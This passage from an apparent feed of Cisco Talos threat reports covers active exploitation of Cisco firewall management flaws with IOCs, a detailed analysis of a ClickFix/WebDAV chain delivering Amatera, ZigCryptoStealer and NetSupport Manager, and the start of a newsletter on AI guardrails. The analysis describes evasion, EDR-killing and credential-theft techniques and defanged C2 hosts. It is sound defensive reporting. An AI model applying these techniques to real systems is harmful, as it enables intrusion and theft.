(5985). Pre-ransomware actions and ransomware deploymentThe threat actor conducted extensive probing of endpoints in the victim&#x2019;s environment, deployed open-source tooling such as impacket, Invoke-TheHash, and custom-made AV killers &#x2014; all followed by the deployment of the Qilin ransomware on selected endpoints. Recommendations and detection guidanceDue to Talos identifying in the wild abuse of these CVE&#x2019;s, customers are strongly advised to apply hotfixes for affected software versions already released by Cisco for CVE-2026-20079 and CVE-2026-20316. A comprehensive hardening release consisting of these hotfixes along with other internally discovered vulnerabilities will be released next week (Week of September 16th). Nonetheless, given the in the wild abuse we strongly recommend that customers apply the referenced hotfixes as soon as possible, pending the hardening release. Customer support is also available by initiating a TAC request. Snort SIDs for CVE-2026-20079: 66075 &#x2013; 66080.Snort SIDs for CVE-2026-20316: 66883.Snort SIDs for the malware: 66960, 66961.Indicators of compromiseIOCs for these threat clusters are also available on our GitHub repository here.&#xA0; IOC Cluster Description B037f45e02a289325a1a5eb0d4db6a9fce9954fd0fdfd07162cb4eb2acbef77d UAT-12197 home[.]jsp &#x2013; web shell. Db491181ece3f319de6567ab6f6daa90c6879911cd890155e6b7d8cc7a1a8c8e UAT-12197 cmd[.]jar &#x2013; JAR-based command executor. 89.34.96[.]56 &#xA0; UAT-11823 NetCat-based reverse shell C2. Cyclop Blink C2. 208.123.119[.]215 UAT-11823 NetCat-based reverse shell C2. 104.218.165[.]253 UAT-11823 Attacker&#x2019;s vulnerability scanner for CVE-2026-20079. 91.214.78[.]118 UAT-11823 NetCat-based reverse shell C2. 6f98add5d1a7729192b6ad8491d85c505c64836f7881742d6b93bd8e3d2fe461 UAT-11823 Cyclops Blink malware. 43.204.2[.]142 UAT-11988 Attacker IP address used to conduct intrusions.","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","threat-advisory","malware","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","cisco-talos-antivirus","landing-page-top-story","geo:inferred"],"relatedCves":["CVE-2026-20079","CVE-2026-20316"],"titleFingerprint":"active-center-cisco-exploitation-firewall-management-secure-vulnerabilities","countryCodes":["GB","RU","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/fmc-ongoing-exploitation/","type":"report","title":"Cisco Talos: Active exploitation of Cisco Secure Firewall Management Center vulnerabilities"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-09T16:08:59.000Z","addedAt":"2026-09-09T16:52:52.515Z","updatedAt":"2026-09-09T16:52:52.515Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"29b18006-26ab-4dde-a932-2572f4195ac6","slug":"talos-clearfake-webdav-infection-chain-delivers-amatera-stealer-3c066663","externalId":"6a97fbc85b9e1a0001b4e2c6","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"ClearFake WebDAV infection chain delivers Amatera stealer, ZigCryptoStealer, and NetSupport Manager","description":"Cisco Talos began an investigation after observing a DLL named \"verification.google\" executing from WebDAV at a Ukrainian government organization. We assess with moderate confidence that the attacks are not targeted at a particular organization, but are a part of a cryptocurrency and credentials-stealing operation using the Amatera stealer as the primary payload.&#xA0;Pivoting around the similar WebDAV behavior led to a second loader named \"pf.ch\" and allowed us to reconstruct its earlier delivery stages. The chain uses a Cloudflare Worker to inject JavaScript code stored on BNB Smart Chain and a ClickFix prompt impersonating Google CAPTCHA, leading to download and execution of Amatera stealer. The chain is likely very similar to what has caused the WebDAV-based execution at the Ukraininan government organization.&#xA0;&#xA0;The two Amatera builds were tasked with different secondary payloads by their respective command-and-control (C2) infrastructure: the \"pf.ch\" loader was instructed to deploy a NativeAOT loader running ZigCryptoStealer and a Go-based reverse proxy, while the \"verification.google\" loader was instructed to install an unauthorized instance of NetSupport Manager.&#xA0;The NetSupport Manager installation contained configuration with the C2 server using an IP address based in Russia. With moderate confidence, we assess that \"verification.google\" branch attack was conducted by a Russian threat actor.&#xA0;&#xA0;&#xA0;In April 2026, Cisco Talos identified an unusual WebDAV DLL execution in endpoint telemetry from a Ukrainian government organization. The remote file was named \"verification.google\" and was launched through the 32-bit version of \"rundll32.exe\". This initial finding led us to two similar delivery chains, two different DLL loaders and two ACR/Amatera stealer payloads. Talos tracks the actor behind the observed \"verification.google\" activity as UAT-10820.&#xA0; Following the initial investigation, we decided to hunt for similar WebDAV and ordinal-execution patterns in an attempt to recover the full infection chain. Using VirusTotal, we were able to identify a full chain from a second DLL loader named \"pf.ch\".&#xA0;&#xA0; These two examples are a part of a wider set of recent campaigns delivering Amatera through different infection chains. In July 2026, Malwarebytes documented fake game and software downloads that used RenPy Loader, MSBuild and EtherHiding before delivering Amatera. Blackpoint Cyber described another fake-verification chain that used a signed Microsoft App-V script, configuration stored in Google Calendar and a payload concealed in a PNG image. Apart from the main payload malware family, we found no common infrastructure or other evidence linking those activities to the chains described in this post.&#xA0; Initial finding in endpoint telemetry&#xA0;The initial event that started the investigation was recorded in April 2026 and it showed an execution of a DLL file through a WebDAV UNC path together with startup of the Windows WebClient service. Apart from the initial command line, we had details of the checksum of the executed DLL but it was not clear what started the execution chain. It was time for hunting in open source intelligence repositories and Talos analytical platform. We wanted to find a similar execution with the similar loader and the payload family and ideally recover the whole infection chain which would likely point to how \"verification.google\" execution was triggered. This lead us to the \"pf.ch\" loader and the chain we discovered.&#xA0;&#xA0; Hunting reveals a second WebDAV delivery chain&#xA0;The \"pf.ch\" sample uses the same combination of WebDAV, a disguised DLL filename and ordinal execution through \"rundll32.exe\". We were also able to recover the full ClickFake related sequence leading to this loader. Figure 1 shows both chains, with dashed elements marking stages that were not directly recovered. With low to medium confidence, we assess that the two delivery chains are identical.&#xA0; Figure 1. Parallel WebDAV infection chains and Amatera secondary payloads.The discovered \"pf.ch\" loader chain was initiated by ClearFake Javascript injected into the content of a compromised site by a malicious Cloudflare worker.&#xA0;&#xA0; The C2 server returned configuration instructing the stealer to download a DLL side-loading package in which a signed Chrome component sideloads a malicious NativeAOT DLL, \"secur32.dll\". The DLL loads ZigCryptoStealer and uses a vulnerable driver to terminate EDR software. A separate x86 shellcode loader with a Go reverse TCP proxy is also downloaded as a secondary payload by the Amatera configuration sent by the C2 server.&#xA0;&#xA0; The secondary payload of the \"verification.google\" branch as instructed by its own C2, is a PowerShell script which attempts to install a sample of NetSupport Manager remote access tool.&#xA0; ClearFake retrieves browser code from BNB Smart Chain&#xA0;The \"pf.ch\" branch begins likely on a compromised website. A Cloudflare Worker injects a malicious JavaScript which queries BNB Smart Chain testnet contract 0x886d310Ac23e05EA705e24E513D19f53793832A9 through \"bsc-testnet-rpc[.]publicnode[.]com\". &#xA0; BNB Smart Chain is a public, Ethereum-compatible blockchain hosting transactions and smart contracts. The actor uses the contract as remotely changeable storage for encoded JavaScript, a technique known as EtherHiding. Based on the operating system of the victim&#x2019;s machine, the JavaScript code retrieves the next stage from the blockchain, which acts as a bulletproof hosting provider for the malicious code. Potent Pages previously documented unauthorized Cloudflare Workers querying the same first stage contract.&#xA0; The initial Javascript code contains routines to check for local and headless browser environments, identifies the operating system, and queries a second contract based on the result of the operation. If the victim is running Windows, it retrieves code from 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff and if the victim is running macOS, it uses 0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5. The response is Base64 decoded and evaluated as JavaScript.&#xA0; &#x200B;Figure 2. Modified, deobfuscated JavaScript selects an OS-specific BNB Smart Chain contract and evaluates the decoded response.The Windows browser stage creates a victim identifier, stores it in the cjs_id cookie and asks a tracking contract whether the goal for that identifier has already been reached. If the browser is not headless and the target is Windows, the script overlays a fake Google CAPTCHA-style checkbox onto the compromised page, instructing the victim to open the Windows Run dialog, paste the clipboard contents, and press Enter.&#xA0; Figure 3. Windows ClickFix verification prompt.&#x200B;&#xA0;The copied command opens a WebDAV path on a randomized subdomain of \"leaguejazire[.]com\", places the victim identifier in the path, and executes \"pf.ch\" through ordinal #1.&#xA0; &#x200B;Figure 4. Decoded Windows ClickFix command. Delayed expansion reconstructs pushd, rundll32 and popd at execution time.Censys documented the same Windows and macOS contracts in a blockchain-backed ClickFix chain, although the downstream payloads in that reporting differ from those analyzed here.&#xA0; The macOS browser stage uses the same headless-browser checks, victim tracking, and fake verification design, but its execution chain is different. It instructs the victim to open Terminal and paste a command that uses curl with a macOS user-agent string. The request goes to a subdomain of \"riyazinikokar[.]xyz\". Since the subject of our initial research was a customer running Windows, we have not further pursued the macOS side of the \"pf.ch\" branch.&#xA0;&#xA0; WebDAV launches disguised DLLs&#xA0;Both observed variants retrieve a 32-bit DLL over WebDAV using a file extension name that does not indicate it is a standard DLL file. Both use the 32-bit \"rundll32.exe\" process and invoke a function by calling the function ordinal #1. The corresponding first exports are moor in \"pf.ch\" and CfgInspectModuleData in \"verification.google\".&#xA0; Different initial loaders&#xA0;Although the WebDAV execution pattern is the same the two initial loaders use different code and protection methods.&#xA0; \"pf.ch\" uses exception-driven control flow&#xA0;The \"pf.ch\" loader is a packed 32-bit DLL whose only named export is moor with import table containing only AddVectoredExceptionHandler and __mb_cur_max functions.&#xA0;&#xA0; The packed code uses vectored exception handling, XOR loops, API hashing, and control-flow patterns, which makes the static analysis of the code more difficult. After the initialization, one of its threads is waiting for an event named hit. Once the event is triggered, it copies an embedded blob into memory and transfers control to it using Windows fibers. The next stage decoder uses XOR and LZNT1 to decode the final Amatera payload.&#xA0; The unpacked PE file, an Amatera sample, is also 32-bit, has no import table, and resolves APIs by walking loaded module export tables. The sample uses 32-to-64-bit transitions to execute system calls, possibly in an attempt to evade EDR hooks.&#xA0;&#xA0; The sample contains the build label 4.1.5-alpha and string GETWELLV2. Amatera is known to use the Steam community profiles as C2 dead drop resolvers, and the GETWELL2 string was observed in some previous samples as a name of a Steam community profile used to retrieve the IP address of the C2 server. Once C2 server address is resolved, the main configuration is downloaded.&#xA0;&#xA0; The Amatera payload was recovered only as a memory-resident artifact and was not observed to be written to disk. Its hash is nonetheless included in the indicator of compromise (IOC) list below, as memory derived hashes remain applicable to memory scanning.&#xA0; \"verification.google\" uses DLL hollowing in \"dbghelp.dll\"&#xA0;The \"verification.google\" variant does not immediately unpack its payload. It first prepares the state and then passes execution through a callback. The callback is registered using the dynamically resolved function TpAllocWork, an undocumented native NT internal function in \"ntdll.dll\". The callback is later executed asynchronously by Windows. The callback function implements most of the malicious unpacking functionality in a large control flow flattening loop.&#xA0; The loader resolves functions by hash, derives execution state from the environment and implements direct WoW64 syscall stubs. The stubs decode syscall numbers at runtime and call the WoW64 transition pointer instead of the corresponding exported \"ntdll.dll\" functions.&#xA0; &#x200B;Figure 5. Direct syscall stub used by \"verification.google\" before it maps and overwrites a clean \"dbghelp.dll\".The loader reconstructs its next stage from data in the .rdata section. It first maps a clean image of the legitimate \"dbghelp.dll\" in memory and then overwrites the beginning of its code section with the unpacked next stage. Finally, it restores executable protection before transferring control to the overwritten code section of the \"dbghelp.dll\".&#xA0;&#xA0; This module overwriting (stomping) technique is also known as DLL hollowing or module overloading. VMRay&#x2019;s technical overview of DLL hollowing describes the same core sequence: loading a legitimate DLL, overwriting its mapped code with malicious content, and executing from that overwritten region. G DATA documented module stomping in a HijackLoader chain that delivered ACRStealer, using different DLLs, \"evr.dll\", and \"rasapi32.dll\" rather than the \"dbghelp.dll\" observed in our case.&#xA0; Figure 6. The \"verification.google\" loader performs module stomping.Amatera C2 configurations&#xA0;\"pf.ch\" loaded Amatera resolves its C2 through a Telegraph page&#xA0;Before starting its Amatera C2 session, the Amatera sample used in \"pf.ch\" branch constructs the dead drop C2 URL \"https[:]//telegra[.]ph/Functions-04-03\". At the time of analysis, the page looked like a short Rust programming tutorial titled &#x201C;Functions.&#x201D; with an altered code example containing the string r.]MTQ1LjI0OS4xMDkuMTQ3)0(.&#xA0; Figure 7. \"Telegra.ph\" page used as a resolver.&#x200B;&#xA0;The raw HTML places the same value inside a println statement.&#xA0;&#xA0; &#x200B;&#xA0;Decoding MTQ1LjI0OS4xMDkuMTQ3 produces &#x201C;145.249.109[.]147&#x201D; as its C2 address.&#xA0;&#xA0; After resolving the address, the payload generates WoW64 transition gates, opens an Auxiliary Function Driver (AFD) socket and connects directly to \"145.249.109[.]147\" on TCP port 443.&#xA0;&#xA0; After connecting to the C2 server, Amatera connects to the GetEndpoints URL on the server. The response supplies randomized URI paths for different C2 functions. The stealer then uses the configuration path, together with an embedded build identifier, to retrieve its information collection rules.&#xA0;&#xA0; In the \"pf.ch\" build, a TLS-decoded HTTP buffer we were able to analyse contained a nonzero session identifier and an opaque 73-byte body whose framing is consistent with the ECDH and ChaCha20-Poly1305 protocol documented for recent Amatera versions.&#xA0;&#xA0; After removal of the transport and application encryption layers, the configuration is first Base64 decoded and then XOR decoded with the key 852149723\\x00, before parsing it as a JSON object.&#xA0;&#xA0; Apart from the rules for stealing data the received configuration also contained the instructions to load secondary payloads in a ld (load) json array.&#xA0;&#xA0; &#x200B;Figure 9. pf.ch Amatera tasking configuration showing secondary payload tasks.The ld field is an array of secondary loader tasks supplied by the Amatera controller. Within each entry, u is the download URL, tf selects the payload type and tr selects file-based (1) or fileless (2) execution. The loader supports executables, DLLs, command scripts, PowerShell, raw shellcode and MSI packages, which is described by the field tf. The p value determines task order, with lower positive values processed first.&#xA0; \"verification.google\" loaded Amatera configuration&#xA0;The \"verification.google\" Amatera build stores its bootstrap controller as an encrypted string. At runtime, it decrypts the fixed address \"45.150.34[.]2\" and connects to it directly on TCP port 443, while presenting \"github[.]com\" as the TLS server name and HTTP Host value. Unlike the \"pf.ch\" build, it does not use a public dead-drop resolver to obtain its initial C2 address. After connecting, it sends the GetEndpoints command to obtain working endpoints used for subsequent communication.&#xA0;&#xA0; As in the \"pf.ch\" Amatera payload the first accessed C2 URL is GetEndpoints. This branch&#x2019;s configuration contains over 400 entries across its browser, extension, messaging, wallet, and other-application collection lists, plus four file collection rules.&#xA0;&#xA0; The application rules in the configuration blob extend the initial browser related information collection to Telegram, Signal, WhatsApp, and other messaging data. They also cover over 100 desktop wallet locations and credential data from password managers, authenticators, FTP clients, mail clients, VPN software, and remote-access tools. Representative targets include KeePass, Bitwarden, 1Password, RoboForm, NordPass, WinAuth, Authy, FileZilla, AnyDesk, NordVPN and AzireVPN.&#xA0; Four file grabber rules cover the Desktop, Downloads, Documents and Windows Recent-items directory. Across those rules, more than 100 unique filename and extension patterns look for private keys, wallet backups, API and OAuth material, two-factor authentication data, password databases and certificate files such as .kdbx, .p12, .pfx and .pem. Most of the collection rules are focused on stealing cryptocurrency related data and credentials.&#xA0;&#xA0; Amatera secondary payloads&#xA0;Further on, we focus on the secondary loader tasks, which may point to a more advanced threat actor, based on the installed secondary payload type.&#xA0; The \"pf.ch\" Amatera build received two secondary tasks. One deployed a NativeAOT loader and ZigCryptoStealer, while the other ran a Go reverse TCP proxy from memory. The \"verification.google\" build received a PowerShell task that installed NetSupport Manager.&#xA0;&#xA0; Amatera branch Task type Follow-on capability pf.ch File-based archive Chrome DLL side-loading host, NativeAOT loader, process termination and ZigCryptoStealer pf.ch Fileless shellcode Go reverse TCP proxy over WebSocket and Yamux verification.google Fileless PowerShell Unauthorized NetSupport Manager remote access NativeAOT chain runs ZigCryptoStealer&#xA0;The \"jquery.min.js\" entry has priority 1, so Amatera processes it first. Its tf: 1 and tr: 1 values select the file-based executable handler. The server response does not have to be a PE file but it can also be an archive file. When this handler receives an archive, the loader extracts it to a temporary directory, enumerates the resulting *.exe file and launches the selected executable. The most recently observed response was a ZIP archive, SHA-256 279d04c0cfd700c8bcb9acbed528131d3ffef8e25d12713e8649772739aecb92.&#xA0;&#xA0; The archive included the file \"platform_experience_helper.exe\", a legitimate Google Chrome component. The executable imports GetUserNameExW from \"Secur32.dll\", which is a malicious DLL file in the archive which gets sideloaded by the Chrome component.&#xA0;&#xA0; The side-loaded \"Secur32.dll\" is a NET NativeAOT loader which decrypts and loads 2 PE files. The first file is a user mode payload and the second a vulnerable driver used to ter. The NativeAOT DLL starts &#x201C;C:\\Windows\\\"explorer.exe\" in a suspended state, manually maps the PE&#x2019;s headers and sections into the child, changes its initial thread context to the new entry point, and resumes it.&#xA0;&#xA0; The payload is a cryptocurrency stealer written in Zig language &#x2014; ZigCryptoStealer. It polls the clipboard, recognizes several cryptocurrency address formats and can replace matching values with addresses embedded in the payload.&#xA0;&#xA0; The payload makes a separate JSON-RPC eth_call through \"bsc[.]rpc[.]blxrbdn[.]com\" to BNB Smart Chain contract 0x7CC3cFC1Ac007B8c6566fD2C7419b15a75473468. This is a second use of EtherHiding in the infection chain, this time by the final payload rather than the browser delivery framework. VMRay has previously documented ZigCryptoStealer variants using BNB Smart Chain contracts as a dead drop for C2 configuration.&#xA0;&#xA0; ZigCryptoStealer disguises the request as a routine query for an ERC-20 token balance. It supplies a randomly generated cryptocurrency address, but the smart contract ignores it and instead returns text stored by the operator. The operator can change this text using the contract&apos;s setData(string) function. During our analysis, the contract returned \"lb[.]propertyfind[.]cc\", which ZigCryptoStealer then used as its C2 domain.&#xA0; The contract was deployed on March 16, 2026. The same wallet that deployed it made 39 successful setData calls through July 26. These calls provide a public history of the C2 values supplied to the malware with six domains active during July:&#xA0; Effective period in UTC Contract value June 30 &#x2013; July 5 fd[.]gstats-api-contact[.]cc July 5 &#x2013; 9 pkg[.]vogueatelier[.]cc July 9 &#x2013; 12 kffd3[.]vogueatelier[.]cc July 12 &#x2013; 18 kffd3[.]vexlatech[.]cc July 18 &#x2013; 26 static[.]quorashift[.]cc July 26 &#x2013; 30 lb[.]propertyfind[.]cc Talos used Cisco Umbrella to observe DNS activity for all six domains while they were active. The two most recent values also had the broadest query distribution. Umbrella data includes DNS quaries from 38 countries for \"static[.]quorashift[.]cc\" and 98 for \"lb[.]propertyfind[.]cc\". Queries for the current value came most often from the United States, Indonesia, Brazil, India, and Egypt.&#xA0;&#xA0; &#x200B;Figure 10. Cisco Umbrella distribution of DNS requests for \"lb[.]propertyfind[.]cc\" from the time it became the current contract value on July 26 through July 30. The map shows the reported share of DNS query origins.&#xA0;Passive DNS shows that all six domains resolved through shared Cloudflare addresses.&#xA0;&#xA0; The second decrypted PE is a signed Windows driver whose version information contains the names MOCOMSYS & DCRC and DCRCV_U Driver (for SCM). Its original filename is \"DCRCVDrv.sys\", and it exposes the device \\Device\\DCRCVDRV_U.&#xA0;&#xA0; The NativeAOT loader enumerates running processes, hashes their names, and compares the hashes with an internal target list of EDR software and other security tools. For every matched process name, it sends the process identifier to the driver with IOCTL 0x2205c0. The driver&#x2019;s handler accepts the four-byte PID, obtains a process handle and calls ZwTerminateProcess. We found no caller authorization check in that IOCTL branch. This gives the loader a kernel-mode process-termination primitive, a BYOVD driver.&#xA0; Figure 11. Modified decompilation from the malicious \"Secur32.dll\" user-mode loader. It enumerates processes, compares hashes of their names with its target list, and sends the PID of each match to the separate driver through IOCTL 0x2205c0.&#xA0;&#x200B; &#x200B;Figure 12. Modified decompilation from the separate signed \"DCRCVDrv.sys\" kernel driver. Its IOCTL handler reads the PID supplied by \"Secur32.dll\", obtains a process handle and calls ZwTerminateProcess. Types and names were replaced for readability. Go payload turns the host into a reverse TCP proxy&#xA0; The URL for the second secondary payload of the \"pf.ch\" branch yielded a binary shellcode blob with SHA-256 643ef35536ff9273fb84b8504467b1a5645cd3ffd5476d64b99244b02131b205.&#xA0; The 32-bit shellcode walks the process environment block (PEB) to find \"ntdll.dll\" and resolves LdrLoadDll, NtAllocateVirtualMemory, NtProtectVirtualMemory and NtFreeVirtualMemory . It then decrypts and decompresses the final payload stored in the shellcode using XOR to decrypt and LZNT1 to decompress the compressed proxy payload.&#xA0; The unpacked file has SHA-256 1819827e17f31e72d456158b6b9c90af25a65945f6f05d04a060da9f24179b25.&#xA0; The payload is a Golang 32-bit Windows executable with main package &#x201C;github.com/acr/proxy-panel/cmd/bot&#x201D;. It includes HashiCorp Yamux network multiplexing library with C2 hardcoded &#x201C;wss://\"update[.]dubbedmuch[.]cc\"/&#x201D;.&#xA0; The proxy reads the Windows MachineGuid and hostname, then sends them over WebSocket Secure (wss) protocol. After the C2 server accepts the client, the program creates a Yamux server session, multiplexing outgoing communications over the same connection. Each logical stream supplies a source and destination address. The client connects to the requested destination and relays bytes in both directions.&#xA0; Figure 13. \"pf.ch\" Amatera runtime and tasking.&#x200B;&#xA0;PowerShell in the \"verification.google\" branch installs NetSupport Manager&#xA0; The secondary payload in this branch is \"https://kr[.]cedar2glanz[.]ru/jewel[.]js\". The tf value 4 of the single secondary payload loader instruction (ld) identifies the payload as PowerShell. The tr value 2 selects the execution path that retrieves the URL with PowerShell DownloadString and runs it through Invoke-Expression (IEX). Proofpoint&#x2019;s Amatera analysis documents the same ld, tf and tr semantics in more details.&#xA0;&#xA0; &#x200B;Figure 14. Reconstructed first PowerShell decoding layer.The next PowerShell stage dynamically resolves native functions and runs an environment check before installing the payload containing the following steps:&#xA0; It queries the C: volume serial and compares it with the hard-coded value 4E014A2F. The original expression returns true when this value matches, allowing execution to continue early and skipping the remaining checks.&#xA0;&#xA0;It calculates system uptime from Win32_OperatingSystem.LastBootUpTime. An uptime below 10 minutes returns false, causing the script to exit.&#xA0;It measures a native 500 ms NtDelayExecution call with GetTickCount64. If fewer than 400 ms appear to elapse, the gate returns false, which can identify an environment that accelerates or skips delays.&#xA0;It checks the processor count. Fewer than three processors unexpectedly returns true and allows execution to continue early rather than rejecting the low-resource system.&#xA0;It queries total physical memory. A reported value below 3.2GiB returns false.&#xA0;It queries Win32_VideoController and selects the largest reported AdapterRAM value. A reported maximum below 384 MiB returns false.&#xA0;It checks display-device friendly names and manufacturers against 36 strings associated with virtual graphics, remote displays, cloud platforms and generic virtual adapters. A match returns false.&#xA0;After the environment checks, the script derives an installation path by hashing MachineGuid|zdozwoqx3c. It also starts two background Powershell runspaces that request many legitimate URLs, including GitHub API, npm, Docker Hub, PyPI, NuGet, and PowerShell Gallery. The requests seem to generate decoy traffic to hide the malicious download within plausible developer activity.&#xA0; The script downloads \"https://phys[.]stunned-amniotic[.]com/hub[.]log\". Although the logs at the targeted system in Ukraine contained no evidence of accessing this URL we were able to download the file that was likely intended to be downloaded and executed by the Amatera stealer payload.&#xA0;&#xA0; The response at the time of analysis was a ZIP file with SHA256 bd36f4c15fe0acb6748da5ed12e45dcc37d412385812c078d1e4f04730e9f69b. Finally, the PowerShell validates ZIP entry paths, extracts the archive in the %APPDATA% directory, and starts \"hypersnap.exe\" executable without a visible window and creates a scheduled task triggered at user logon.&#xA0; The ZIP contains legitimate NetSupport Manager software&#xA0;The launched \"hypersnap.exe\" is a renamed, signed NetSupport Manager 12.44 \"client32.exe\". The \"client32.exe\" stub calls the export _NSMClient32@8 in signed \"PCICL32.DLL\", the main NetSupport client runtime containing the main functionality of the remote access platform.&#xA0;&#xA0; The actor-controlled \"client32.ini\" NetSupport Manager configuration enables silent operation, hides the system-tray interface, disables visible chat, message, disconnect, replay and help controls and configures \"paternal-angrily[.]com:443\" as the NetSupport HTTP Gateway.&#xA0; The client connects to the gateway, which acts as a proxy between the threat actor and the NetSupport Manager client installation at the victim system. The NetSupport client was configured to poll the gateway every 60 seconds. At the time of the analysis the domain resolved to the IP address \"212.118.56[.]166\", based in Russia.&#xA0;&#xA0; The NetSupport deployment used a license issued as KAKAN, with serial number NSM789508. The exact license file has appeared in numerous malicious NetSupport packages, including activity publicly tracked as EVALUSION and IClickFix. We therefore treat it as an indicator of shared deployment lineage rather than a unique threat actor identifier.&#xA0; NetSupport adds an operator driven capability after Amatera&#x2019;s automated collection. Amatera steals configured credentials, session data, cryptocurrency material, and selected files. An unauthorized NetSupport client can then provide screen and input control, file transfer, inventory, process and service management and remote command or PowerShell execution. This could let an operator inspect data outside Amatera&#x2019;s predefined rules, act on sessions from the original endpoint, or deploy additional tooling.&#xA0;&#xA0; Indicators of compromise (IOCs)&#xA0;The IOCs for this threat are also available at our GitHub repository here.&#xA0;","cveId":null,"cvssScore":null,"cvssVector":null,"severity":"unknown","vendor":null,"product":null,"affectedVersions":[],"cwes":[],"tags":["talos","threat-research","cisco","cisco-talos-antivirus","cisco-talos-malware-protection","cisco-talos-network-intrusion-prevention","threats","threat-spotlight","geo:inferred"],"relatedCves":[],"titleFingerprint":"amatera-chain-clearfake-delivers-infection-manager-netsupport-stealer-webdav-zigcryptostealer","countryCodes":["BR","EG","ID","IN","RU","UA","US"],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.talosintelligence.com/clearfake-webdav-infection-chain/","type":"report","title":"Cisco Talos: ClearFake WebDAV infection chain delivers Amatera stealer, ZigCryptoStealer, and NetSupport Manager"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-08T10:01:07.000Z","addedAt":"2026-09-08T10:52:52.070Z","updatedAt":"2026-09-08T10:52:52.070Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[]},{"id":"c52514fa-fa90-45bc-9bc0-07717783a1ca","slug":"talos-sorry-i-can-t-help-with-that-how-your-guardrails-might-become-0458c861","externalId":"6a8f25b509b4ad0001399a54","source":"Cisco Talos","sourceType":"vendor-rss","type":"security-news","title":"“Sorry, I can’t help with that”: How your guardrails might become the attacker’s best friend","description":"Welcome to this week&#x2019;s edition of the Threat Source newsletter.&#xA0; Hello, everyone. Long time reader, first time writer here at the Threat Source newsletter! I wanted to start out by introducing myself. My colleague and friend Mick Baccio set the bar pretty high last week, so I was planning to tell you all about myself, including:&#xA0; How I did my first real IR under the influence of The Cuckoo&#x2019;s Egg while an undergraduate (and failed)&#xA0;My pre-bug bounty flirtation with vulnerability research, including an arbitrary file overwrite in biff(1) and how I once hacked MIT&#x2019;s website&#xA0;My first ever hands-on experience with a computer, the display demo Commodore 64 at the Montgomery Ward&#xA0;Unfortunately, my editor says we don&#x2019;t have the &#x201C;space&#x201D; for that, the MIT thing might open me up to &#x201C;liability,&#x201D; and it&#x2019;s not the kind of &#x201C;professional image&#x201D; we strive for here at Talos. (I&apos;m watching. Always watching. -Amy)&#xA0; So instead, I&#x2019;ll just play it safe and say that I&#x2019;ve been in the security field for a little over 30 years now, mostly concentrating on the defensive side (Go, Team Blue!). I&#x2019;ve helped set up SOCs, run threat hunting teams, and even published a few things you might have heard of.&#xA0;&#xA0; Speaking of things I&#x2019;ve published, I&#x2019;ve written before about the Attacker&#x2019;s Dilemma. The idea that defenders have inherent advantages over attackers runs contrary to what most of us have heard throughout our careers. An attacker must evade monitoring and technical controls at every step of their attack lifecycle, because the defender only needs to notice once in order to respond and prevent them from achieving their goal. This is one of the most important advantages of any security team has, but we are currently witnessing a self-imposed erosion of this advantage through the rise of poorly-designed AI guardrails.&#xA0;&#xA0; I&#x2019;m not opposed to guardrails, but we have to carefully consider what we&#x2019;re guarding against and where we deploy them. As I explored in a recent piece on The Safety Penalty, by allowing third-party AI providers to implement and control safety filters and the policies behind them, we may in fact be helping the attacker. If agentic SOC process experience refusals, it can slow or even halt investigations. Of course, these should get flagged for human intervention, but that takes time and may give the attacker breathing room in which to complete their mission.&#xA0;&#xA0; It may turn out that the where of the guardrails is even more important than the what. Operational sovereignty relies on having control of our own limits. Any vision of an agentic SOC must allow the security teams to customize the guardrails according to their own threat model. They should also have the flexibility to temporarily remove specific safeguards under authorized circumstances, something you won&#x2019;t get with guardrails from a frontier provider. These controls belong inside your organization&#x2019;s agentic harness where you can set the policies and technical controls to allow you to analyze threats while ensuring your agents stay within their lanes.&#xA0;&#xA0; Ultimately, operational sovereignty means engaging with the reality of the threat landscape, ensuring that the adversary can&#x2019;t derail the defender&#x2019;s investigation and response processes, either accidentally or intentionally. We need to move toward a model where each organization can choose the guardrails that work for them, rather than having inflexible guardrails chosen for them.&#xA0; The one big thing &#xA0;Cisco Talos recently evaluated 66 large language model (LLM) and reasoning combinations to see if we could find a clear winner&#xA0;for security operations. Instead, we found that selecting the right model is a complex balancing act between efficacy, speed, cost, and consistency. Cranking up a model&apos;s reasoning effort doesn&apos;t guarantee better analysis and can actually degrade performance. Ultimately, we developed a repeatable methodology to help organizations navigate these tradeoffs for their own workflows.&#xA0; Why do I care?&#xA0;Choosing an AI model based solely on generic leaderboard scores is a recipe for operational disaster. An exceptionally smart model might cost a fortune, take half an hour to analyze a single log, or completely fail to format its output. Assuming more compute power equals better results is a costly trap, as higher reasoning settings sometimes produce weaker or blocked responses. Defenders must remember that prompts, analyst personas, and model consistency drastically alter an investigation&apos;s outcome.&#xA0;&#xA0; So now what?&#xA0;Test models against your organization&#x2019;s specific workflows before deploying them. Build a focused set of representative cases and test them multiple times using the exact prompts and tools your analysts will actually use. Track the quality, cost, time, consistency, and usable-answer rates in a simple spreadsheet to expose the real-world tradeoffs. Finally, establish acceptable thresholds for these variables to eliminate underperforming models, and regularly revisit your decisions as AI technology and pricing inevitably shift.&#xA0; Top security headlines of the week&#xA0;ToxicPanda banking trojan matures into enterprise threat&#xA0; ToxicPanda 2.0 expands substantially on its predecessor, adding 167 remote commands and broadening its targeting from 16 financial institutions to 349 banking, e-wallet, and cryptocurrency applications. (Dark Reading)&#xA0; Interpol&apos;s Jackal IV disrupts West African crime infrastructure&#xA0; Law enforcement from 22 countries across six continents worked together to arrest 58 suspects and identify 263 more. The first two Jackal operations in 2022 and 2023 led to approximately 200 arrests in total and millions of dollars more in seized assets. (Dark Reading)&#xA0; First malware built specifically for car head units fuels botnet&#xA0; Researchers have found what appears to be the first malware specifically designed for car head units, with links to the notorious BadBox botnet, on an Android-powered aftermarket infotainment system made by Chinese company DoFun, which is widely used in China and other APAC countries. (SecurityWeek)&#xA0; A Tale of 